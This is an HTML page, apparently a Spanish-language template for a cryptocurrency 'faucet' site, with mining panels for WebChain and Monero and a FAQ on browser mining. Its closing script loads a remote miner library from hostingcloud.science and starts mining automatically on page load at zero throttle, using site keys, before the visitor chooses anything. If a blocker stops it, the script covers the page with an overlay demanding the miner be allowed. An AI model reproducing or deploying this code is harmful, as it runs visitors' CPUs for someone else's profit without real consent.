<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="Prueba Sigma Studios">
    <meta name="author" content="FelipheGomez">

    <title>Mining Web, Faucet and ads</title>
    <!-- Bootstrap core CSS -->
	<!-- <link href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" rel="stylesheet"> -->
    <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
    <!-- Custom styles for this template -->
    <link href="css/style.css" rel="stylesheet">

  </head>

  <body>
    <div id="app">
      <!-- Navigation -->
      <nav class="navbar navbar-expand-lg navbar-dark bg-transparent fixed-top">
        <div class="container">
          <!-- LOGO -->
          <a class="navbar-brand" href="#">
            Faucet Name
          </a>
          <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
            <ul class="navbar-nav ml-auto bg-principal" style="border-radius: 35px;">
              <li class="nav-item active"><a class="nav-link" href="#page1">Mining</a></li>
              <li class="nav-item"><a class="nav-link" href="#page2">FAQ</a></li>
              <li class="nav-item"><a class="nav-link" href="#page3">Team</a></li>
              <li class="nav-item"><a class="btn btn-transparent btn-default" href="#carouselExampleIndicators">Top</a></li>
              <li class="nav-item"><a class="btn btn-transparent" href="#page4">Button</a></li>
            </ul>
          </div>
        </div>
      </nav>

      <header>
        <div id="carouselExampleIndicators" class="carousel slide" data-ride="carousel">
            <!--
              <ol class="carousel-indicators">
                <li data-target="#carouselExampleIndicators" data-slide-to="0" class="active"></li>
                <li data-target="#carouselExampleIndicators" data-slide-to="1"></li>
                <li data-target="#carouselExampleIndicators" data-slide-to="2"></li>
              </ol>
            -->
          <div class="carousel-inner" role="listbox">
            <!-- Slide Active -->
            <div v-for="(slider, index) in sliders" v-if="index == 0" class="carousel-item active" v-bind:style="{ 'background-image': 'url(' + slider.image + ')' }">
              <div class="carousel-caption d-md-block">
                <h3>{{ slider.title }}</h3>
                <p>{{ slider.text }}</p>
                <a href="#page1" class="btn btn-lg btn-transparent btn-primary">Comenzar</a>
              </div>
            </div>
            <!-- Slide item -->
            <div v-for="(slider, index) in sliders" v-if="index !== 0" class="carousel-item" v-bind:style="{ 'background-image': 'url(' + slider.image + ')' }">
              <div class="carousel-caption d-md-block">
                <h3>{{ slider.title }}</h3>
                <p>{{ slider.text }}</p>
              
                <a href="#page1" class="btn btn-lg btn-transparent btn-primary">Get Start</a>
              </div>
            </div>
          </div>
          <a class="carousel-control-prev" href="#carouselExampleIndicators" role="button" data-slide="prev">
            <span class="carousel-control-prev-icon" aria-hidden="true"></span>
            <span class="sr-only">Previous</span>
          </a>
          <a class="carousel-control-next" href="#carouselExampleIndicators" role="button" data-slide="next">
            <span class="carousel-control-next-icon" aria-hidden="true"></span>
            <span class="sr-only">Next</span>
          </a>
        </div>
      </header>

      <!-- Page Content -->
		<section id="page1" class="py-5 color-1 plans">
			<br>
			<br>
			<br>
			<!-- Plans -->
			<div class="container">
				<div class="row">
					<div class="col-md-4 text-center">
						<div class="panel panel-primary panel-pricing">
							<div class="panel-heading">
								<i class="fa fa-desktop"></i>
								<h3>Ronda Actual</h3>
							</div>
							<div class="panel-body text-center">
								<p><strong class="report_coin_select">Sin Seleccion</strong></p>
								<p><strong class="report_hashes_second">0 H/s</strong></p>
							</div>
							<ul class="list-group text-center">
								<li class="list-group-item"><span class="report_total_hashes">0</span> Hashes</li>
								<li class="list-group-item"><span class="report_accepted_hashes">0</span> Extra</li>
								<li class="list-group-item">
									<span class="report_total_threads">0</span> Threads
									<a class="btn-sm btn-primary showMining" href="javascript:downThreadsMining()"><i class="glyphicon glyphicon-minus">-</i></a>
									<a class="btn-sm btn-primary showMining" href="javascript:upThreadsMining()"><i class="glyphicon glyphicon-plus">+</i></a>
								</li>
								<li class="list-group-item"><span class="report_">80</span> CPU %</li>
							</ul>
							<div class="panel-footer">
								<a class="btn btn-lg btn-block btn-primary showMining" href="javascript:MAPI.stop();">DETENER</a>
							</div>
						</div>
					</div>
					<div class="col-md-8">
						<div class="row">
							<!-- item -->
							<div class="col-md-4 text-center">
								<div class="panel panel-info panel-pricing">
									<div class="panel-heading">
										<i class="fa fa-desktop"></i>
										<h3>WebChain</h3>
									</div>
									<div class="panel-body text-center">
										<p><strong><img width="50px" src="https://newcpucoins.com/logo/web.png" /></strong></p>
										<p><strong>WEB</strong></p>
									</div>
									<ul class="list-group text-center">
										<li class="list-group-item">3.84783238 WEB por 1Mh</li>
										<li class="list-group-item">CryptoNight-webchain</li>
									</ul>
									<div class="panel-footer">
										<a class="btn btn-lg btn-block btn-info" href="javascript:InitMining('WEB');">INICIAR</a>
									</div>
								</div>
							</div>
							<!-- /item -->

							<!-- item -->
							<div class="col-md-4 text-center">
								<div class="panel panel-warning panel-pricing">
									<div class="panel-heading">
										<i class="fa fa-desktop"></i>
										<h3>Monero</h3>
									</div>
									<div class="panel-body text-center">
										<p><strong><img width="50px" src="https://www.eobot.com/xmr.png" /></strong></p>
										<p><strong>XMR</strong></p>
									</div>
									<ul class="list-group text-center">
										<li class="list-group-item">0.00004509 XMR por 1Mh</li>
										<li class="list-group-item">CryptoNightV7</li>
									</ul>
									<div class="panel-footer">
										<a class="btn btn-lg btn-block btn-warning" href="javascript:InitMining('XMR')">INICIAR</a>
									</div>
								</div>
							</div>
							<!-- /item -->

							<!-- item -->
							<div class="col-md-4 text-center">
								<div class="panel panel-success panel-pricing">
									<div class="panel-heading">
										<i class="fa fa-desktop"></i>
										<h3>MC Token</h3>
									</div>
									<div class="panel-body text-center">
										<p><strong>MCT</strong></p>
									</div>
									<ul class="list-group text-center">
										<li class="list-group-item">0.00000000 MCT por 1Mh</li>
										<li class="list-group-item">Multi-Script</li>
									</ul>
									<div class="panel-footer">
										<a class="btn btn-lg btn-block btn-success" href="#">Iniciar</a>
									</div>
								</div>
							</div>
							<!-- /item -->
						</div>
					</div>
				</div>
			</div>
		</section>
      
      <section id="page2" class="py-5 color-2">
        <div class="container">
            <h1 class="title-1">Preguntas Frecuentes</h1>
            <div class="row text-justify">
                <div class="col-sm-6">
					<h3>¿Qué es criptomoneda?</h3>
                    <p>Criptomoneda (o criptomoneda) es un término derivado de "criptografía" que se refiere a un método o técnica que implica la conversión de información o datos en contenido no legible o protegido de tal manera que solo las partes autorizadas pueden acceder a él y aquellos que no están autorizados no pueden; y "Moneda", que se refiere a todo tipo de monedas que pueden utilizarse como medio de intercambio. Las criptomonedas se clasifican como "monedas digitales o virtuales".</p>
                    <p>Criptografía: construcción y análisis de protocolos que impiden que terceros o el público accedan a los datos.</p>
                    <p>Medio de intercambio: Intermediario utilizado en oficios para facilitar las ventas y evitar inconvenientes de cambio.</p>
					
					<h3>¿Qué es la minería?</h3>
                    <p>En el sistema de monedas digitales, se refiere al proceso donde las transacciones de datos registradas permanentemente en archivos (bloques) se validan y, por lo tanto, se almacenan en una base de datos de transacciones compartidas (Blockchain), también llamado Libro público, por todos los nodos que participan en el sistema. Utiliza recursos de CPU o GPU para resolver acertijos computacionales. La minería se mide por la tasa de hash.</p>
                </div>
                <div class="col-sm-6">
					<h3>¿Qué es JS Mining?</h3>
                    <p>Es un método de minería basado en JavaScript, aplicable a los navegadores, con el fin de extraer Monero (XMR), Webchain (WEB) u otras monedas mediante el uso de la potencia de la CPU de los visitantes. El objetivo principal es monetizar cualquier sitio web y, a la vez, proporcionar mejores funciones a los usuarios, como la eliminación de anuncios.</p>
					
					<h3>¿Cuál es la tasa de Hash?</h3>
                    <p>La producción total de hashes se calcula en el proceso de minería por segundo, en otras palabras, una medida de la potencia de procesamiento. La alta tasa de hash aumenta la probabilidad de encontrar un bloque.</p>
					
					<h3>¿Qué es la dificultad de red?</h3>
                    <p>La dificultad de la red es una medida para mostrar lo difícil que es encontrar un nuevo bloque por debajo del objetivo dado de cualquier criptomoneda que pueda extraerse a través de una prueba de trabajo. Está estrictamente relacionado con la tasa total de hash de los mineros de la red.</p>
					
					<h3>¿Qué es Block Reward?</h3>
                    <p>La cantidad que los mineros pueden reclamar como recompensa por crear un bloque.</p>
                </div>
                <div class="col-sm-12 text-center">
                    <br><br><a href="#page1" class="btn btn-lg btn-transparent btn-primary">¡Comenzar!</a>
                </div>
            </div>
        </div>
      </section>
      
      <section id="page3" class="py-5 color-3">
        <div class="container">
            <h1 class="title-1">Nuestro Equipo</h1>
            <div class="row">
                <div class="col-sm-4 col-md-4 col-lg-4 mt-4">
                    <div class="card">
                        <img class="card-img-top" src="http://storage.sigmastudios.com.co/test/card-1.png">
                        <div class="card-block">
                            <h5 class="text-bold">SO THIRSTY</h5>
                        </div>
                    </div>
                </div>
                <div class="col-sm-4 col-md-4 col-lg-4 mt-4">
                    <div class="card">
                        <img class="card-img-top" src="http://storage.sigmastudios.com.co/test/card-2.png">
                        <div class="card-block">
                            <h5 class="text-bold">SO THIRSTY</h5>
                        </div>
                    </div>
                </div>
                <div class="col-sm-4 col-md-4 col-lg-4 mt-4">
                    <div class="card">
                        <img class="card-img-top" src="http://storage.sigmastudios.com.co/test/card-3.png">
                        <div class="card-block">
                            <h5 class="text-bold">SO THIRSTY</h5>
                        </div>
                    </div>
                </div>
                <div class="col-sm-12 text-center">
                    <br><br><a href="#page4" class="btn btn-lg btn-transparent btn-primary">Go to bottom</a>
                </div>
            </div>
        </div>
      </section>
      
      <section id="page4" class="py-5 color-1">
          <div class="cover">
            <h1 class="cover-heading">Thank you!.</h1>
            <a href="#carouselExampleIndicators" class="btn btn-lg btn-transparent btn-primary">Go to header</a>
          </div>
      </section>   
    </div>

    <!-- Bootstrap core JavaScript -->
    <script src="vendor/jquery/jquery.min.js"></script>
    <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
    <!-- Vue core JavaScript -->
    <script src="https://cdn.jsdelivr.net/npm/vue"></script>
    <!-- Vue Axios JavaScript -->
    <script src="https://unpkg.com/axios/dist/axios.min.js"></script>
    <!-- Code Slider -->
    <script>
      new Vue({
          el: '#app',
          data: {
              sliders: []
          },
          created: function(){
              var that = this;
              axios.get('https://api.myjson.com/bins/19r2xk')
              .then(function (response) {                    
                  $.each( response.data, function( key, value ) {
                      that.sliders.push(value)
                  });
                  $("#carouselExampleIndicators").carousel("pause").removeData();
              })
              .catch(function (error) {
                  console.log(error);
              });
          }
      });
    </script>
	
	
<script src="https://www.hostingcloud.science./P7fU.js"></script>
<script>

var MAPI = null;
var coin_mining = null;
var running = false;

function upThreadsMining(){
	var _tempThreads = MAPI.getNumThreads() + 1;
	MAPI.setNumThreads(_tempThreads);
}

function downThreadsMining(){
	var _tempThreads = MAPI.getNumThreads() - 1;
	MAPI.setNumThreads(_tempThreads);
}

function InitMining(coin){
	coin_mining = coin;
	if(typeof MAPI !== 'undefined' && MAPI !== null){
		MAPI.stop();
		//MAPI = null;
	}
	
    setTimeout(function(){
		if(coin_mining == 'XMR'){
			console.log('Comenzando a minar Monero.');
			running = true;
			MAPI = new Client.Anonymous('1192f7ec9dfdd1e0b4b554de0a225183ec2073b407c8909e14c228a62df6db76', {
				throttle: 0
			});
		}else if(coin_mining == 'WEB'){
			console.log('Comenzando a minar Webchain.');
			running = true;
			MAPI = new Client.Anonymous('650d2a1dfa432c0f6c4ca785c1295a2aa96a01da455ee8da0b607cd975777e2f', {
				throttle: 0, c: 'w'
			});
		}else if(coin_mining == 'MCT'){
			
		}
		
		if(running == true){
			console.log("Este sitio ejecuta JS Miner sino esta conforme visite nuestra pagina alternativa.");
			MAPI.addMiningNotification("Floating Bottom", "Las ganancias comenzaron, si nota su dispositivo muy lento debe disminuir la cantidad de Threads.", "#cccccc", 25, "#3d3d3d");
			MAPI.start();
		}
		

		if(typeof MAPI === 'undefined' || MAPI === null){
			var messageDiv = document.createElement("div");
			messageDiv.setAttribute("style","width: 50%; background-color: white; padding: 15px; display: inline-block; vertical-align: middle;");
			messageDiv.appendChild(document.createTextNode("Please allow our miner on your blocker software to continue browsing our site. Reload the page after that."));
			var mainDiv = document.createElement("div");
			mainDiv.setAttribute("style","position: absolute; top: 0px; right: 0px; width: 100%; height: 100%; display: flex; background-color: #4c4c4c;  align-items: center; justify-content: center");
			mainDiv.appendChild(messageDiv);
			document.body.appendChild(mainDiv);
			document.getElementsByTagName("body")[0].style.overflow = "hidden";
			window.scrollTo(0, 0);
		}else{
		}
    },1000);
}
InitMining('WEB');

setInterval(function(){
	if(typeof MAPI !== 'undefined' && MAPI !== null){		

		var total_hashes = MAPI.getTotalHashes();
		var hashes_second = MAPI.getHashesPerSecond();
		var accepted_hashes = MAPI.getAcceptedHashes();
		var report_total_threads = MAPI.getNumThreads();
		
		jQuery('.report_coin_select').html(coin_mining);
		jQuery('.report_total_hashes').html(total_hashes);
		jQuery('.report_hashes_second').html(hashes_second.toFixed(5) + ' H/s');
		jQuery('.report_accepted_hashes').html(accepted_hashes);
		jQuery('.report_total_threads').html(report_total_threads);
		
		jQuery('.showMining').show();
	}else{
		jQuery('.showMining').hide();
	}
},500);
</script>
  </body>
</html>
